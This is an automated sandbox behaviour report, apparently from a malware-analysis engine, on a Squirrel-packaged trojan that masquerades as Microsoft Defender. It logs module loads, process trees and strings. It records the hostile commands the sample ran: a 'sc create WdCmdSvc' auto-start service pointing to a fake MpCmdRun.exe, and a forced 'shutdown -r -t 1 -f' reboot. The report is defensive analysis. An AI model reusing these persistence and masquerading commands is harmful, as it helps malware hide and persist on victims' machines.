Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: msctfui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: mpsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: mpsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: shutdownext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: sspicli.dll	Jump to behavior

Source: 0219830219301290321012notas.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0219830219301290321012notas.exe

Static PE information: Section: .rsrc ZLIB complexity 0.9935229745216583

Source: MpCmdRun.exe0.7.dr

Binary string: kernelbase.dllRaiseFailFastException%wswilstd::exception: %hsonecore\internal\sdk\inc\wil\opensource\wil\resource.h_p0WilError_03Bad optional accessamcore\antimalware\source\service\tools\mpcmdtool\mpperformancereport.cppProcessIdReasonPID\\?\\Device\\drivers\\FI_UNKNOWNerror: invalid data: System path changed during the trace from "%ls" to "%ls"

Source: classification engine

Classification label: mal72.rans.troj.evad.winEXE@15/77@1/1

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Code function: 0_2_00D41050 FindResourceW,LoadResource,

0_2_00D41050

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

File created: C:\Program Files (x86)\Microsoft.NET\base

Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File created: C:\Users\user\AppData\Local\ContentPack

Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-9ACA4B710A2695B9A2B410022D61910DE7EA5660

Jump to behavior

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Command line argument: kernel32.dll		0_2_00D47326
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Command line argument: --checkInstall		0_2_00D47326

Source: 0219830219301290321012notas.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0219830219301290321012notas.exe

Virustotal: Detection: 16%

Source: 0219830219301290321012notas.exe	String found in binary or memory: "%s" --install . %s
Source: 0219830219301290321012notas.exe	String found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
Source: Update.exe	String found in binary or memory: b=\|baseUrl={Provides a base URL to prefix the RELEASES file packages with-a=\|process-start-args=iArguments that will be used when starting executable-l=\|shortcut-locations=
Source: Update.exe	String found in binary or memory: ((?=^[ ]{{0,{0}}}[^ \t\n])\|\Z) # Lookahead for non-space at line-start, or end of doc
Source: Update.exe	String found in binary or memory: onError%Downloading file: 1Failed downloading URL: #Downloading url: 1Failed to download url: !squirrel-install3Starting automatic update7Failed to check for updates5Failed to download updates/Failed to apply updates9Failed to set up uninstaller){0} {1}{2} {3} # {4}
Source: Update.exe	String found in binary or memory: Scanning {0}mIgnoring {0} as the target framework is not compatible%Writing {0} to {1}UCouldn't find file for package in {1}: {0}%--squirrel-install%--squirrel-updated'--squirrel-obsolete)--squirrel-uninstall'--squirrel-firstrunAFailed to handle Squirrel events[\StringFileInfo\040904B0\SquirrelAwareVersion)SquirrelAwareVersion;Failed to promote Tray icon:
Source: Update.exe	String found in binary or memory: ..\Update.exegUpdate.exe not found, not a Squirrel-installed app?
Source: Update.exe	String found in binary or memory: update.MNo release to install, running the appIFailed to install package to app dirIFailed to update local releases file;Failed to invoke post-install;Starting fixPinnedExecutables)Fixing up tray icons
Source: Update.exe	String found in binary or memory: -delta.nupkg$iCannot apply combinations of delta and full packagesQCouldn't run Squirrel hook, continuing: ---squirrel-updated {0}---squirrel-install {0}9Squirrel Enabled Apps: [{0}]wNo apps are marked as Squirrel-aware! Going to run them all-Failed to delete key: /--squirrel-obsolete {0}7Couldn't delete directory: QCoudln't run Squirrel hook, continuing: WcleanDeadVersions: checking for version {0}kcleanDeadVersions: exclude current version folder {0}ccleanDeadVersions: exclude new version folder {0}

Source: unknown	Process created: C:\Users\user\Desktop\0219830219301290321012notas.exe C:\Users\user\Desktop\0219830219301290321012notas.exe
Source: unknown	Process created: C:\Users\user\Desktop\0219830219301290321012notas.exe "C:\Users\user\Desktop\0219830219301290321012notas.exe" --rerunningWithoutUAC
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Process created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe"
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
Source: C:\Windows\SysWOW64\shutdown.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Process created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto	Jump to behavior

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: Microsoft Malware Protection.lnk.3.dr	LNK file: ..\..\..\..\..\..\Local\ContentPack\BumpFiles.exe
Source: Microsoft Malware Protection.lnk0.3.dr	LNK file: ..\AppData\Local\ContentPack\BumpFiles.exe

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentPack

Jump to behavior

Source: 0219830219301290321012notas.exe

Static file information: File size 2102272 > 1048576

Source: 0219830219301290321012notas.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1d6600

Source: 0219830219301290321012notas.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 0219830219301290321012notas.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 0219830219301290321012notas.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 0219830219301290321012notas.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 0219830219301290321012notas.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 0219830219301290321012notas.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 0219830219301290321012notas.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 0219830219301290321012notas.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.1403703222.000000000293C000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: OfflineScannerShell.pdb source: OfflineScannerShell.exe.7.dr
Source:	Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.7.dr
Source:	Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.7.dr
Source:	Binary string: netstandard.pdb.mdb source: Update.exe
Source:	Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000003.00000002.1403703222.0000000002915000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe0.3.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdb source: MpDetoursCopyAccelerator.dll.7.dr
Source:	Binary string: endpointdlp.pdb source: endpointdlp.dll.7.dr
Source:	Binary string: DefenderCSP.pdb source: DefenderCSP.dll.7.dr
Source:	Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.7.dr
Source:	Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.7.dr
Source:	Binary string: shellext.pdb source: shellext.dll.7.dr
Source:	Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.7.dr
Source:	Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 0219830219301290321012notas.exe
Source:	Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.7.dr
Source:	Binary string: ProtectionManagement.pdbGCTL source: ProtectionManagement.dll.7.dr
Source:	Binary string: MpCommu.pdb source: MpCommu.dll.7.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpDetoursCopyAccelerator.dll.7.dr
Source:	Binary string: MpCommu.pdbGCTL source: MpCommu.dll.7.dr
Source:	Binary string: shellext.pdbOGPS source: shellext.dll.7.dr
Source:	Binary string: ProtectionManagement.pdb source: ProtectionManagement.dll.7.dr
Source:	Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.7.dr
Source:	Binary string: MsMpEng.pdb source: Update.exe, 00000003.00000002.1403703222.00000000028CA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.000000000297E000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe, 00000004.00000000.1375829576.00000000006C1000.00000020.00000001.01000000.00000008.sdmp, BumpFiles.exe, 00000007.00000000.1386117010.00000000006C1000.00000020.00000001.01000000.00000008.sdmp, MsMpEng.exe.7.dr
